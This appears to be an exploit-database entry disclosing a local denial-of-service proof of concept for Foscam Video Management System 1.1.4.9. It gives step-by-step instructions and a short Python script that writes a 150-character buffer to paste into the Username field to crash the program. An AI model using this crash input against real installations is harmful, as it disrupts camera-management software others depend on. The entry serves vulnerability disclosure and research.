Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)

2019-01-07
ID: 100714
CVE: None
Download vulnerable application: Download
# Exploit Title: 
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python FoscamVMS_1.1.4.9.py
# 2.- Open FoscamVMS_1.1.4.9.txt and copy content to clipboard
# 3.- Open FoscamVMS
# 4.- User Name -> admin
# 5.- Password ->
# 6.- Login
# 7.- System Settings
# 8.- User Management Settings
# 9.- Add
# 10.- Paste ClipBoard on "Username"
# 11.- Password -> P4ssw0rd
# 12.- Save
# 13.- Crashed

#!/usr/bin/env python
 
buffer = "\x41" * 150
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()
1.3.0 (www02)